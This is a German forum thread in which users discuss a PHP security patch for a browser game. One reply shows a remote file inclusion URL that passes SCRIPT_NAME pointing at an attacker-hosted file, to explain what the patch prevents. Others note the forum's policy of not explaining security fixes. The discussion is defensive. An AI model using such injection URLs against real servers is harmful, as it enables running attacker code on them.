| anpera.net https://anpera.dyndns.org/phpbb3/ |
|
| Frage zu einem Patch https://anpera.dyndns.org/phpbb3/viewtopic.php?f=34&t=5066 |
Seite 1 von 1 |
| Autor: | Welv [ Sa 16 Jan, 2010 16:43 ] |
| Betreff des Beitrags: | Frage zu einem Patch |
Ich wollte mal fragen was folgender Patch genau bewirkt: $this->bbcode_second_pass_code('', ' if (substr($SCRIPT_NAME,strrpos($SCRIPT_NAME,".php"))!=".php" || strpos($PATH_INFO,".php")){ echo "Verarbeitung abgebrochen. Das Script ist ungueltig."; ') Hier wird doch nur überprüft ob die angeforderte Datei die Endung .php hat. Ist dies nicht der Fall, würde doch weder die common.php eingebunden werden noch dieses codeschnippsel ausgeführt werden. |
|
| Autor: | Salator [ Sa 16 Jan, 2010 17:52 ] |
| Betreff des Beitrags: | Re: Frage zu einem Patch |
Ich vermute mal, dieser Code soll Seitenaufrufe wie diesen verhindern: http://deinserver.de/source.php?SCRIPT_NAME=http://zombieserver.com/id.txt Falls du deinen Server nun (bewusst oder fahrlässig) so konfiguriert hast, dass Code von extern ausgeführt werden kann, würde nun das ausgeführt werden was der Angreifer in id.txt geschrieben hat. Hier greift der erste Teil der Abfrage, der Scriptname endet nicht mehr mit .php Nun könnte der Angreifer seine Datei umbenennen zu id.php Jetzt greift der 2. Teil der Abfrage, im Pfadname, also vor dem letzten / kommt .php vor In beiden Fällen würde "ungültiges Script" ausgegeben werden. |
|
| Autor: | Tidus [ Sa 16 Jan, 2010 18:18 ] |
| Betreff des Beitrags: | Re: Frage zu einem Patch |
mmmhmm... War es nicht mal so gehandhabt worden das in diesem forum die "Bugfixes / Patches" nicht extra erklärt werden da es leute gibt, die es vlt ausnutzen falls es doch mal jemand nicht gemacht hat o.ä. ? kann auch sein das ich mich irre >_> |
|
| Autor: | Welv [ Sa 16 Jan, 2010 18:24 ] |
| Betreff des Beitrags: | Re: Frage zu einem Patch |
Zitat: Das funktioniert? Gibts dazu ne Doku? Find nämlich nix ^^ |
|
| Autor: | Rikkarda [ Sa 16 Jan, 2010 18:37 ] |
| Betreff des Beitrags: | Re: Frage zu einem Patch |
Tidus hat geschrieben: mmmhmm... War es nicht mal so gehandhabt worden das in diesem forum die "Bugfixes / Patches" nicht extra erklärt werden da es leute gibt, die es vlt ausnutzen falls es doch mal jemand nicht gemacht hat o.ä. ? kann auch sein das ich mich irre >_> ist so, daher werden sicherheitsfixe auch nur gepostet und anpera über die Hintergründe informiert 
|
|
| Autor: | Tidus [ Sa 16 Jan, 2010 18:43 ] |
| Betreff des Beitrags: | Re: Frage zu einem Patch |
Gut dann bin ich ja doch noch nicht Senil >_> |
|
| Seite 1 von 1 | Alle Zeiten sind UTC + 1 Stunde |
| Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/ |
|